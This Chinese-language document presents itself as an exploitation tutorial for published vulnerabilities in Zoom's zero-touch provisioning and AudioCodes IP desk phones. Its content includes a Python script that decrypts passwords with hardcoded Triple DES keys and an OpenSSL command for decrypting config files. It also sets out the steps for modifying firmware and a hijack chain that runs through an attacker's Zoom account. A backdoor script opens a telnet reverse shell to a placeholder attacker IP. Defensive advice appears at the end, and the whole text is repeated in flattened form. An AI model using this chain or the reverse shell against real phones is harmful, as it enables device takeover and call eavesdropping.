利用Zoom的零接触配置( Zero Touch Provision)进行远程攻击:针对桌面电话的入侵方法
字数 1682 2025-08-23 18:31:34

Zoom零接触配置(ZTP)安全漏洞分析与利用教学文档

1. 概述

本文档详细分析Zoom零接触配置(ZTP)服务与AudioCodes桌面电话中存在的安全漏洞,并提供完整的漏洞利用教学。这些漏洞可组合使用,实现远程控制设备、窃听通话、构建僵尸网络等攻击。

2. 关键漏洞总结

产品 漏洞类型 SySS ID CVE ID
AudioCodes IP-Phones (UC) 使用硬编码的加密密钥 SYSS-2022-052 CVE-2023-22957
AudioCodes Provisioning Service 敏感信息暴露 SYSS-2022-053 N.A.
AudioCodes IP-Phones (UC) 使用硬编码的加密密钥 SYSS-2022-054 CVE-2023-22956
AudioCodes IP-Phones (UC) 硬件中缺少不可变的可信根 SYSS-2022-055 CVE-2023-22955
Zoom Phone System Management 未经核实的所有权 SYSS-2022-056 N.A.

3. Zoom ZTP工作流程分析

3.1 标准工作流程

  1. 管理员在Zoom Phone管理界面添加新设备并分配配置模板
  2. 厂商重定向服务被激活并被告知设备已分配给Zoom
  3. 出厂设置的设备向厂商重定向服务请求配置
  4. 重定向服务将请求转发至Zoom ZTP服务
  5. 桌面电话向Zoom ZTP服务请求设备配置
  6. ZTP服务响应分配的配置模板

3.2 认证机制

  • 基于客户端证书的双向TLS认证
  • User-Agent请求头验证
  • 客户端证书CN属性必须匹配设备MAC地址或序列号

4. AudioCodes设备分析

4.1 重定向服务漏洞

  • 访问redirect.audiocodes.com无需认证
  • URL中可能包含敏感信息
  • 可扫描整个MAC地址范围获取配置信息

4.2 密码解密

  1. 发现Base64编码的加密密码
  2. 分析/lib/libaq201.so和/lib/libac_des3.so库
  3. 逆向decrypt_string函数
  4. 提取硬编码的Triple DES密钥和IV
  5. 使用Python脚本解密密码

解密脚本示例:

#!/usr/bin/env python3
import sys
import base64
from Crypto.Cipher import DES3
from binascii import unhexlify

KEY = unhexlify('604075fb...') 
IV = unhexlify('a3a4...35cb...')

def decrypt(ciphertext):
    ciphertext_decoded = base64.b64decode(ciphertext)
    cipher = DES3.new(KEY, DES3.MODE_CBC, iv=IV)
    plaintext = cipher.decrypt(ciphertext_decoded)
    print(f"plain text password: {plaintext.decode('utf-8')}")

if __name__ == '__main__':
    decrypt(sys.argv[1])

4.3 配置文件解密

  1. 分析/lib/libcgi.so和decryption_tool可执行文件
  2. 发现使用EVP_des_ede3_cbc算法
  3. 提取硬编码的密钥派生字符串
  4. 使用OpenSSL解密配置文件

解密命令:

openssl enc -d -des-ede3-cbc -pass pass:$secret -nosalt \
-in encrypted_config.cfx -out plain_config.cfg

4.4 固件映像分析

  1. 下载官方固件并分析结构
  2. 发现固件包含多个区域和简单校验和
  3. 修改固件内容并重新计算校验和
  4. 成功安装修改后的固件映像

固件结构:

  • 固件头部(元信息)
  • bootloader.img
  • rootfs.ext4
  • phone.img
  • section.map
  • flasher
  • release
  • end.section

5. 攻击链构建

5.1 攻击步骤

  1. 将目标设备MAC地址添加到攻击者Zoom账户
  2. 分配包含恶意配置的模板(指向攻击者控制的固件)
  3. 目标设备恢复出厂设置
  4. 设备通过ZTP下载并安装恶意固件
  5. 获取设备root权限shell

5.2 恶意固件修改

  1. 提取rootfs.ext4文件系统
  2. 添加后门脚本(如反向shell)
  3. 修改启动脚本(/home/ipphone/rcS)
  4. 重新打包固件并计算校验和

示例后门脚本:

#!/bin/sh
/bin/sleep 120
TF=$(/bin/mktemp -u)
/usr/bin/mkfifo $TF
/usr/bin/telnet <ATTACKER-IP> 5000 0<$TF | /bin/sh 1>$TF

6. 防御建议

  1. 实施强认证机制验证设备所有权
  2. 避免使用硬编码加密密钥
  3. 实现固件签名验证机制
  4. 保护重定向服务中的敏感信息
  5. 限制可添加设备的MAC地址范围
  6. 实施固件完整性检查

7. 总结

通过组合利用Zoom ZTP服务和AudioCodes设备中的多个漏洞,攻击者可实现远程设备控制。这凸显了云服务与传统硬件集成时的安全风险,建议厂商和用户采取适当防护措施。

Zoom零接触配置(ZTP)安全漏洞分析与利用教学文档 1. 概述 本文档详细分析Zoom零接触配置(ZTP)服务与AudioCodes桌面电话中存在的安全漏洞,并提供完整的漏洞利用教学。这些漏洞可组合使用,实现远程控制设备、窃听通话、构建僵尸网络等攻击。 2. 关键漏洞总结 | 产品 | 漏洞类型 | SySS ID | CVE ID | |------|----------|---------|--------| | AudioCodes IP-Phones (UC) | 使用硬编码的加密密钥 | SYSS-2022-052 | CVE-2023-22957 | | AudioCodes Provisioning Service | 敏感信息暴露 | SYSS-2022-053 | N.A. | | AudioCodes IP-Phones (UC) | 使用硬编码的加密密钥 | SYSS-2022-054 | CVE-2023-22956 | | AudioCodes IP-Phones (UC) | 硬件中缺少不可变的可信根 | SYSS-2022-055 | CVE-2023-22955 | | Zoom Phone System Management | 未经核实的所有权 | SYSS-2022-056 | N.A. | 3. Zoom ZTP工作流程分析 3.1 标准工作流程 管理员在Zoom Phone管理界面添加新设备并分配配置模板 厂商重定向服务被激活并被告知设备已分配给Zoom 出厂设置的设备向厂商重定向服务请求配置 重定向服务将请求转发至Zoom ZTP服务 桌面电话向Zoom ZTP服务请求设备配置 ZTP服务响应分配的配置模板 3.2 认证机制 基于客户端证书的双向TLS认证 User-Agent请求头验证 客户端证书CN属性必须匹配设备MAC地址或序列号 4. AudioCodes设备分析 4.1 重定向服务漏洞 访问redirect.audiocodes.com无需认证 URL中可能包含敏感信息 可扫描整个MAC地址范围获取配置信息 4.2 密码解密 发现Base64编码的加密密码 分析/lib/libaq201.so和/lib/libac_ des3.so库 逆向decrypt_ string函数 提取硬编码的Triple DES密钥和IV 使用Python脚本解密密码 解密脚本示例: 4.3 配置文件解密 分析/lib/libcgi.so和decryption_ tool可执行文件 发现使用EVP_ des_ ede3_ cbc算法 提取硬编码的密钥派生字符串 使用OpenSSL解密配置文件 解密命令: 4.4 固件映像分析 下载官方固件并分析结构 发现固件包含多个区域和简单校验和 修改固件内容并重新计算校验和 成功安装修改后的固件映像 固件结构: 固件头部(元信息) bootloader.img rootfs.ext4 phone.img section.map flasher release end.section 5. 攻击链构建 5.1 攻击步骤 将目标设备MAC地址添加到攻击者Zoom账户 分配包含恶意配置的模板(指向攻击者控制的固件) 目标设备恢复出厂设置 设备通过ZTP下载并安装恶意固件 获取设备root权限shell 5.2 恶意固件修改 提取rootfs.ext4文件系统 添加后门脚本(如反向shell) 修改启动脚本(/home/ipphone/rcS) 重新打包固件并计算校验和 示例后门脚本: 6. 防御建议 实施强认证机制验证设备所有权 避免使用硬编码加密密钥 实现固件签名验证机制 保护重定向服务中的敏感信息 限制可添加设备的MAC地址范围 实施固件完整性检查 7. 总结 通过组合利用Zoom ZTP服务和AudioCodes设备中的多个漏洞,攻击者可实现远程设备控制。这凸显了云服务与传统硬件集成时的安全风险,建议厂商和用户采取适当防护措施。